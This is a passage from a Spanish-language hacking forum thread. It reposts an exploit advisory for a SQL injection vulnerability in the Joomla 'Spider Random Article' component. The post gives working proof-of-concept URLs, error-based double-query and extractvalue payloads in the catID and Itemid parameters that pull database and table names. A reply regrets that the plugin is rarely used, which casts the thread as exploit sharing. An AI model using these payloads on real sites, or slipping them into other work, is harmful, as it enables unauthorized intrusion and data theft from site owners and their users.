send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Joomla Spider Random Article Component - SQL Injection

  • 1 Respuestas
  • 1673 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 127
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Abril 06, 2015, 12:16:50 am »
Código: You are not allowed to view links. Register or Login
##################################################################################################
#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : http://demo.web-dorado.com/spider-random-article.html
#Date          : 22/03/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################
 
////////////////////////
/// Overview:
////////////////////////
 
 
joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters
and hence affected by SQL injection vulnerability
 
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to catID and Itemid parameter
 
 
////////////////
///  POC   ////
///////////////
 
 
SQL Injection in catID parameter
=================================
 
Use error based double query injection with catID parameter
 
Injected Link--->
 
Like error based double query injection for exploiting username --->
http://server/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13
 
 
SQL Injection in Itemid parameter
=================================
 
Itemid Parameter is exploitable using xpath injection
 
http://server/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -
 
###################################################################################################
You are not allowed to view links. Register or Login

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #1 en: Abril 06, 2015, 03:04:35 am »
No se si busque mal pero parece un complemento Joomla poco utilizado jaja, una lastima.

 

¿Te gustó el post? COMPARTILO!



vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

Iniciado por morodog

Respuestas: 1
Vistas: 1583
Último mensaje Junio 09, 2013, 12:05:31 pm
por ANTRAX
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 7547
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

Respuestas: 2
Vistas: 2080
Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
HTML injection (Ataque y Defensa) [Practico] By 2Fac3R

Iniciado por 2Fac3R

Respuestas: 2
Vistas: 1675
Último mensaje Diciembre 28, 2012, 03:03:19 am
por 2Fac3R
MySQL Injection - Técnicas para vulnerar un servidor web [PDF]

Iniciado por M5f3r0

Respuestas: 5
Vistas: 2453
Último mensaje Diciembre 11, 2013, 01:26:10 am
por dark.newb1e.zer0